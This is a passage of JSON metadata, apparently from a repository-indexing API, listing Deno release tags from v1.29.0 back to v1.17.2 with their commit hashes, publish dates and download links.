e":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://cod